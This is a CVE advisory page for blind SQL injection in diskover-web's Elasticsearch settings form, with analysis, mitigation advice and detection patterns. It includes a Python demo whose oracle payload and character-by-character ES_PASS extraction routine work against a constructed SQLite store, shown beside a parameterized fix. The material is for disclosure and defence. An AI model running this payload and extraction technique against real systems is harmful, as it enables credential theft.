
CVE-2025-50984: n/a

Medium
Published: Wed Aug 27 2025 (08/27/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

diskover-web v2.3.0 Community Edition is vulnerable to multiple boolean-based blind SQL injection flaws in its Elasticsearch configuration form. Unsanitized user input in POST parameters such as ES_PASS, ES_MAXSIZE, ES_TRANSLOGSIZE, ES_TIMEOUT, ES_USER, ES_HOST, ES_PORT, ES_SCROLLSIZE, ES_CHUNKSIZE and others can be crafted to inject arbitrary SQLite expressions wrapped in JSON functions. By exploiting these injection points, an attacker can infer or extract sensitive information from the underlying database without authentication. This issue stems from improper input validation and parameterization in the application's JSON-based query construction.

AI-Powered Analysis

Last updated: 08/27/2025, 16:02:49 UTC

Technical Analysis

CVE-2025-50984 covers multiple boolean-based blind SQL injection flaws in diskover-web v2.3.0 Community Edition, in the form used to save the application's Elasticsearch connection settings. The affected POST parameters include ES_PASS, ES_MAXSIZE, ES_TRANSLOGSIZE, ES_TIMEOUT, ES_USER, ES_HOST, ES_PORT, ES_SCROLLSIZE and ES_CHUNKSIZE, among others. Their values are concatenated into SQL statements that wrap them in SQLite JSON functions, without validation or parameter binding, so a value containing a single quote can close the intended string literal and append arbitrary SQLite expressions. The injected statements run against the application's own SQLite database, not against Elasticsearch: the Elasticsearch settings are simply the data being written, and that data includes credentials (ES_USER, ES_PASS). The injection is boolean-based and blind, meaning the injected expression returns no data directly; instead the attacker chooses a condition that makes the statement succeed or fail and reads the answer from the application's response (saved versus error), one yes/no question at a time, which is enough to recover stored values such as the length and each character of a credential. Unlike time-based blind injection, no timing measurement is needed, so the extraction is reliable. The CVE description states that no authentication is required, so the vulnerable handler is reachable by remote, unauthenticated users. No exploitation in the wild has been reported and the record carries no CVSS score; that is usual for a freshly published entry and says nothing about low severity. Unauthenticated reachability plus a reliable inference oracle makes this a serious issue that should be addressed promptly.

Potential Impact

For European organizations running diskover-web v2.3.0 Community Edition, the immediate exposure is the confidentiality of whatever the application keeps in its SQLite database. Because the injection is unauthenticated and yields a reliable yes/no oracle, an attacker can systematically read back stored configuration, including the Elasticsearch credentials (ES_USER, ES_PASS) and connection details that the same form manages. Those credentials may in turn grant direct access to the file metadata indexed in Elasticsearch and provide a foothold for lateral movement. Since the configuration form is itself reachable without authentication, an attacker may also be able to alter the stored Elasticsearch settings, disrupting indexing and search availability. Organizations subject to GDPR and sector-specific rules (finance, healthcare, government) face compliance and notification obligations if indexed personal data or credentials are exposed. Search and data-management infrastructure is typically trusted by downstream systems, so a compromise here can propagate well beyond the diskover-web host.

Mitigation Recommendations

Upgrade diskover-web as soon as a fixed release is published by the maintainers. Until then, the effective code-level fix is to stop building SQL from form values: bind every value as a parameter in the SQLite statements that write the configuration (the JSON functions accept bound parameters like any other argument), check setting names against a fixed allowlist, and validate types first so numeric settings such as ES_PORT, ES_TIMEOUT, ES_MAXSIZE, ES_TRANSLOGSIZE, ES_SCROLLSIZE and ES_CHUNKSIZE are rejected unless they parse as integers in a sane range. Validation alone is not a substitute for parameterization. At the deployment level, require authentication for the configuration pages and restrict the diskover-web interface to trusted internal addresses or a VPN, since the flaw is exploitable without credentials. Detection is straightforward: boolean-based extraction needs many POSTs to the settings endpoint carrying single quotes, CASE/SELECT keywords or sqlite_master references in ES_* parameters, with a burst of save errors interleaved with successes, so alert on that pattern and on unexpected changes to the stored Elasticsearch settings. If exposure cannot be ruled out, treat the stored Elasticsearch credentials as compromised, rotate them, and review Elasticsearch access logs for use of those credentials from unexpected sources. Reduce the Elasticsearch account used by the application to least privilege, and audit other applications that build SQL or Elasticsearch queries from user input for the same pattern.
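The vulnerable construction described in the Technical Analysis and the parameterized fix recommended above, as an added example written for this page in Python (diskover-web itself is PHP; this is not its code). The table and column names, the key allowlist, the stored secret and the form's saved/error behaviour are assumptions constructed for the demonstration. The oracle shows how a single quote closes the literal inside json_set() and how a CASE expression turns an arbitrary condition into saved-versus-error, which is enough to read ES_PASS one character at a time; the hardened function binds the same value and stores the payload as inert text.

```python
"""Added example (not diskover-web's code): a boolean-based blind SQL
injection oracle against a SQLite settings store that wraps form values in
JSON functions, shown beside the parameterized fix. Table and column names,
the key allowlist and the stored secret are assumptions for this demo."""
import sqlite3

ALLOWED_KEYS = {"ES_HOST", "ES_PORT", "ES_USER", "ES_PASS", "ES_TIMEOUT",
                "ES_MAXSIZE", "ES_TRANSLOGSIZE", "ES_SCROLLSIZE", "ES_CHUNKSIZE"}
INT_KEYS = {"ES_PORT", "ES_TIMEOUT", "ES_MAXSIZE", "ES_TRANSLOGSIZE",
            "ES_SCROLLSIZE", "ES_CHUNKSIZE"}


def make_db(es_pass="s3cret!"):
    """Constructed sample: a single settings row holding the ES config as JSON."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE settings (id INTEGER PRIMARY KEY, data TEXT NOT NULL)")
    conn.execute("INSERT INTO settings VALUES (1, json_object('ES_HOST', 'localhost', "
                 "'ES_PORT', 9200, 'ES_USER', 'elastic', 'ES_PASS', ?))", (es_pass,))
    conn.commit()
    return conn


def read_setting(conn, key):
    """What the form would render back; used here only to inspect results."""
    return conn.execute("SELECT json_extract(data, ?) FROM settings WHERE id = 1",
                        (f"$.{key}",)).fetchone()[0]


def save_setting_vulnerable(conn, key, value):
    """Vulnerable pattern: the POST value is pasted into the SQL text, so a
    single quote in `value` closes the literal inside json_set() and the rest
    runs as SQLite. Returns True/False the way a form says saved/error."""
    sql = f"UPDATE settings SET data = json_set(data, '$.{key}', '{value}') WHERE id = 1"
    try:
        conn.execute(sql)
        conn.commit()
        return True
    except sqlite3.Error:
        conn.rollback()
        return False


def save_setting_fixed(conn, key, value):
    """Hardened: allowlisted key, integer fields type-checked, value bound as a
    parameter so it can only ever be data, never SQL."""
    if key not in ALLOWED_KEYS:
        raise ValueError(f"unknown setting {key!r}")
    if key in INT_KEYS:
        value = int(value)  # "9200 OR 1=1" raises ValueError here
    conn.execute("UPDATE settings SET data = json_set(data, ?, ?) WHERE id = 1",
                 (f"$.{key}", value))
    conn.commit()
    return True


# Subquery the attacker reads, one comparison at a time.
TARGET = "(SELECT json_extract(data, '$.ES_PASS') FROM settings WHERE id = 1)"


def oracle(save, conn, condition):
    """One probe. If `condition` holds, CASE yields a harmless literal and the
    UPDATE succeeds; otherwise it evaluates json('x' || random()), which SQLite
    rejects as malformed JSON, and the UPDATE fails. random() keeps that branch
    non-constant so SQLite cannot pre-evaluate it outside the CASE. The
    attacker sees only saved-vs-error, never the data itself."""
    payload = f"' || CASE WHEN ({condition}) THEN 'h' ELSE json('x' || random()) END || '"
    return save(conn, "ES_HOST", payload)


def extract_es_pass(save, conn, max_len=64):
    """Recover ES_PASS via the oracle: calibrate on known true/false conditions,
    find the length, then each character by code point (unicode() avoids any
    quoting inside the probe). Returns None when no oracle is available."""
    if oracle(save, conn, "1 = 0") or not oracle(save, conn, "1 = 1"):
        return None
    length = next((n for n in range(1, max_len + 1)
                   if oracle(save, conn, f"length({TARGET}) = {n}")), None)
    if length is None:
        return None
    recovered = []
    for pos in range(1, length + 1):
        for code in range(32, 127):  # printable ASCII; widen for other data
            if oracle(save, conn, f"unicode(substr({TARGET}, {pos}, 1)) = {code}"):
                recovered.append(chr(code))
                break
        else:
            return None
    return "".join(recovered)


if __name__ == "__main__":
    print("vulnerable:", extract_es_pass(save_setting_vulnerable, make_db()))
    print("fixed:     ", extract_es_pass(save_setting_fixed, make_db()))
```

Two things worth noticing when running it: every successful probe against the vulnerable handler overwrites ES_HOST with the literal from the CASE, so the attack is noisy and leaves a clear trace in the stored configuration, which is exactly the change-detection signal recommended above; and against the hardened handler the calibration step fails immediately, because a bound parameter makes the statement succeed regardless of its content and the payload simply lands in ES_HOST as text.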


Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2025-06-16T00:00:00.000Z
Cvss Version
null
State
PUBLISHED

Threat ID: 68af28a6ad5a09ad00637382

Added to database: 8/27/2025, 3:47:50 PM

Last enriched: 8/27/2025, 4:02:49 PM

Last updated: 8/28/2025, 12:34:05 AM
